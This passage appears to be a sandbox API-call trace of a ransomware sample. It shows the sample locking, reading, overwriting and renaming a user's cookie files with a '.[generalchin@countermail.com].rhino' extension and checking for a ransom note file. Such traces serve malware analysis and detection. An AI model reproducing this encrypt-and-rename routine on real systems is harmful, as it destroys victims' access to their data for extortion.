hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x201) returned 0x23b00f0 [0089.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0300 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0408 [0089.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0300 | out: hHeap=0x6d0000) returned 1 [0089.423] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0300 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0590 [0089.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0300 | out: hHeap=0x6d0000) returned 1 [0089.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b06d8 [0089.425] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0590 | out: hHeap=0x6d0000) returned 1 [0089.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b08c0 [0089.425] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06d8 | out: hHeap=0x6d0000) returned 1 [0089.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0b90 [0089.425] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b08c0 | out: hHeap=0x6d0000) returned 1 [0089.425] WriteFile (in: hFile=0xec, lpBuffer=0x23b0b90*, nNumberOfBytesToWrite=0x321, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0b90*, lpNumberOfBytesWritten=0x2cfa04*=0x321, lpOverlapped=0x0) returned 1 [0089.425] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b90 | out: hHeap=0x6d0000) returned 1 [0089.425] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x321, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.425] CloseHandle (hObject=0xec) returned 1 [0089.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0300 [0089.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0590 [0089.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0300 | out: hHeap=0x6d0000) returned 1 [0089.427] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0590 | out: hHeap=0x6d0000) returned 1 [0089.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0408 | out: hHeap=0x6d0000) returned 1 [0089.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.446] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1ea [0089.446] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x30a, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.446] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.446] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.449] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.450] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1ea, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1ea, lpOverlapped=0x0) returned 1 [0089.450] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.450] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.450] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.450] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.450] GetLastError () returned 0x0 [0089.450] SetLastError (dwErrCode=0x0) [0089.450] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.450] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1ea) returned 0x23b0198 [0089.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0390 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0498 [0089.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0390 | out: hHeap=0x6d0000) returned 1 [0089.451] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0390 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0620 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0390 | out: hHeap=0x6d0000) returned 1 [0089.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0768 [0089.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0620 | out: hHeap=0x6d0000) returned 1 [0089.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0950 [0089.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0768 | out: hHeap=0x6d0000) returned 1 [0089.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0089.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0950 | out: hHeap=0x6d0000) returned 1 [0089.453] WriteFile (in: hFile=0xec, lpBuffer=0x75ef78*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ef78*, lpNumberOfBytesWritten=0x2cfa04*=0x30a, lpOverlapped=0x0) returned 1 [0089.454] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0089.454] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x30a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.454] CloseHandle (hObject=0xec) returned 1 [0089.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.455] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0620 [0089.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.455] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0620 | out: hHeap=0x6d0000) returned 1 [0089.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0498 | out: hHeap=0x6d0000) returned 1 [0089.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.456] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.456] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.518] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1c8 [0089.518] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2e8, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.518] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.518] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.520] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.521] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1c8, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1c8, lpOverlapped=0x0) returned 1 [0089.521] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.521] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.521] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.521] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.521] GetLastError () returned 0x0 [0089.521] SetLastError (dwErrCode=0x0) [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c8) returned 0x23b00f0 [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b02c0 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b03c8 [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02c0 | out: hHeap=0x6d0000) returned 1 [0089.522] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b02c0 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0550 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02c0 | out: hHeap=0x6d0000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0698 [0089.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0550 | out: hHeap=0x6d0000) returned 1 [0089.524] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2e8) returned 0x23b0880 [0089.524] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0698 | out: hHeap=0x6d0000) returned 1 [0089.524] WriteFile (in: hFile=0x104, lpBuffer=0x23b0880*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0880*, lpNumberOfBytesWritten=0x2cfa04*=0x2e8, lpOverlapped=0x0) returned 1 [0089.524] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0880 | out: hHeap=0x6d0000) returned 1 [0089.524] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2e8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.524] CloseHandle (hObject=0x104) returned 1 [0089.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0550 [0089.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.526] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0550 | out: hHeap=0x6d0000) returned 1 [0089.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03c8 | out: hHeap=0x6d0000) returned 1 [0089.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.527] 